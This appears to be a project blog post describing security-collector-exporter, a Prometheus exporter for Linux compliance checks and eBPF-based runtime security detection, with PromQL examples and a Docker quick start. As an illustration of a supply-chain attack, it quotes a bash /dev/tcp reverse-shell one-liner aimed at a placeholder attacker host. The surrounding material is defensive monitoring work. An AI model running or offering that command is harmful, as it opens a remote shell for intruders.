From Compliance to Real-Time Defense: The Evolution of security-collector-exporter

The Origin: Compliance Check Hassles

Anyone in operations knows there’s no escaping one hurdle for domestic servers: Cybersecurity Level Protection (GB/T 22239-2019, commonly known as “Level Protection 2.0”). Whether you’re Level 3 or Level 2, auditors come asking about these things:

  • Is SSH root login disabled? Are password policies compliant?
  • Is the firewall on? Is SELinux enforcing?
  • Are there expired accounts? What’s the password validity period?
  • Which ports are open? Are there high-risk services running?
  • Are audit logs enabled? How long are they retained?

There are plenty of compliance check tools on the market—search GitHub and you’ll find a bunch: Golin, EvaluationTools, Linux-Security-Compliance-Check, etc. But they all share one limitation: Run once, get a report, done. You check compliance today, and someone changes sshd_config tomorrow, turns off the firewall, installs a backdoor service—you’d never know.

The starting point for security-collector-exporter v0.1.0 was simple: turn all these security configuration states into Prometheus metrics, integrate into the existing monitoring system, continuously track, and automatically alert. Not “check once,” but “keep watching.”

It covers the main Linux host-level check items from Level Protection 2.0:

Compliance AreaCorresponding MetricsIssues Discovered Through Continuous Monitoring
Identity AuthenticationPassword policy, shadow fieldsSomeone changed password validity, created weak-policy accounts
Access ControlSSH config, hosts.allow/denyRoot login re-enabled, access control relaxed
Security Auditauditd status, crontab entriesAudit service stopped, suspicious scheduled tasks added
Intrusion PreventionFirewall status, SELinux modeFirewall turned off, SELinux set to permissive
Network SecurityPort list, service statusNew high-risk ports opened, unauthorized services started

Combined with Prometheus alert rules, you can detect configuration changes as they happen. During compliance audits, just pull up the Grafana dashboard—no need to SSH into machines one by one.

v0.1.0 solved a very specific pain point. But as we used it, we realized: Static configuration checks only cover the “compliance” aspect; the other side of security events is completely invisible.

Blind Spots That Static Checks Can’t See

Here’s a real example. In 2024, there was a Python supply chain attack: a compromised third-party library executed a reverse shell at runtime via execve:

bash
1
/bin/sh -c "bash -i >& /dev/tcp/attacker-IP/port 0>&1"

This type of attack is completely invisible to traditional security baseline checks:

  • SSH configuration is fine ✓
  • Firewall is on ✓
  • SELinux enforcing ✓
  • Password policy compliant ✓

Your server looks perfectly fine from a compliance perspective, but the attack is already happening.

There are many similar scenarios:

  • Container escape: A process in a pod escalates privileges to the host via kernel vulnerabilities
  • Kernel module backdoor: Someone insmod loads a rootkit kernel module
  • Abnormal network connections: A business container suddenly starts connecting to external suspicious IPs
  • Sensitive file reads: Unauthorized processes reading /etc/shadow or private key files
  • Brute force privilege escalation: Someone repeatedly attempting setuid / capset

These are all runtime events—they happen and are gone; there’s no trace left by the time you run your next baseline check. Linux’s built-in auditd can record some, but it’s designed for traditional hosts, doesn’t understand container and Kubernetes context, drops events under high load, and basically can’t trace process chains across namespaces.

This is where eBPF shines.

eBPF: Kernel-Level Real-Time Security Monitoring

eBPF’s core capability: attach to various hook points (tracepoints, kprobes) in kernel space, aggregate data directly in the kernel when events occur, with zero copy and low overhead—no need to send every event to user space.

Tetragon (from Cilium) is the most well-known open-source project in this direction, widely adopted in Kubernetes security. There’s a production case: in a 3000-node cluster, Tetragon detected a reverse shell from a supply-chain-compromised Python library—from event occurrence to localization in just 4 minutes. With traditional audit logs, tracing the same event could take a day.

But Tetragon is Kubernetes-oriented, focused on policy enforcement, and has a certain deployment and configuration threshold. Many scenarios don’t need something that heavy—you might just want to add a layer of security event awareness to your existing Prometheus monitoring system without needing a full policy engine.

security-collector-exporter started adding eBPF support from v0.2.0. It’s lighter but very practical:

Five Categories of Real-Time Security Events

text
1
2
3
4
5
Process Tracing    → Who's executing what? Did a container spawn a shell?
Network Connections → Who's connecting externally? Any abnormal outbound traffic?
File Access        → Who's reading sensitive files? Who touched /etc/shadow?
Privilege Detection → Someone doing setuid/capset? Success or failure?
Kernel Modules     → Are kernel modules being loaded?

The Static + eBPF Combination

What’s interesting is that when eBPF metrics are combined with static metrics, the effect isn’t 1+1=2, it’s 1+1>2:

promql
1
2
3
4
5
6
7
# Static metric: Firewall is on ✓
linux_security_firewall_enabled{is_running="true"} == 1

# eBPF metric: But someone is trying to connect to external suspicious ports
increase(security_ebpf_connect_total{direction="out"}[5m]) > 100

# Combined: Firewall compliant + abnormal outbound traffic → possible process bypassing firewall rules

Or:

promql
1
2
3
4
5
6
7
# Static metric: SSH config compliant
linux_security_sshd_config_info{info_key="PermitRootLogin", info_value="no"} == 1

# eBPF metric: But a process tried setuid to root
increase(security_ebpf_privilege_escalation_total{type="setuid", result="failure"}[10m]) > 10

# Combined: SSH hardened but someone is brute-forcing privileges → possible other entry point exploited

Static metrics tell you “is the config correct,” eBPF metrics tell you “what’s actually happening.” Only when combining these two dimensions do you get true security situational awareness.

From v0.1.0 to v0.3.0

text
1
2
3
4
5
v0.1.0    Static security configuration collection, 15 metric categories, compliance-focused
v0.2.0    Added eBPF, 5 BPF programs, real-time security event monitoring
v0.3.0    Bug fixes, ARM compatibility, production-grade stability

v0.2.0 was the feature release—all eBPF core capabilities were there—but running it in real environments revealed many problems: BPF programs had incorrect kernel struct field references, UDP kprobes didn’t exist on target kernels, ARM device version detection would stall the entire collection cycle. v0.3.0 spent a day fixing all these hard issues—switching from PERCPU_ARRAY to PERCPU_HASH to solve race conditions, adding a PID hash map for process exit classification, rewriting the Aggregator with delta tracking, adding timeouts and caching for version detection.

v0.3.0 is the first version you can confidently run in production.

Scenario Coverage

A diagram showing what we can now handle:

ScenarioStatic Metrics (v0.1.0)eBPF Metrics (v0.3.0)
Level Protection 2.0 compliance checks-
SSH/firewall/SELinux config drift detection-
Password policy and account lifecycle monitoring-
Port and service change tracking-
Reverse shell / suspicious process detection-
Container anomaly behavior monitoring-
Privilege escalation attack detection-
Kernel module backdoor detection-
Sensitive file unauthorized access-
Abnormal outbound connection detection-
Security posture scoring✅ (combined)

From “passing compliance checks” to “continuous security monitoring”—same tool, but capabilities have leveled up.

Who It’s For

  • Compliance scenarios: Teams that need to continuously demonstrate security configuration compliance, no more cramming before each audit
  • Ops security teams: Already using Prometheus + Grafana for infrastructure monitoring, want to add a layer of security awareness
  • Container environments: Need to know what’s running in containers, who they’re connecting to, any abnormal behavior
  • Small to medium server management: Don’t need a full SIEM or SOAR platform, but need basic security observability
  • Security research / education: Want to understand what eBPF can do in security, this is a lightweight implementation you can play with

Quick Start

bash
1
2
3
4
5
6
7
# Docker one-liner (with eBPF)
docker run -d \
  --name security-exporter \
  --privileged \
  -p 9102:9102 \
  ghcr.io/mickeyzzc/security-collector-exporter:0.3.0 \
  --ebpf.enabled

Without --ebpf.enabled, it runs in pure static collection mode, fully compatible with v0.1.0.

Project repositories:

If you find it useful, feel free to star, file an issue, or submit a PR.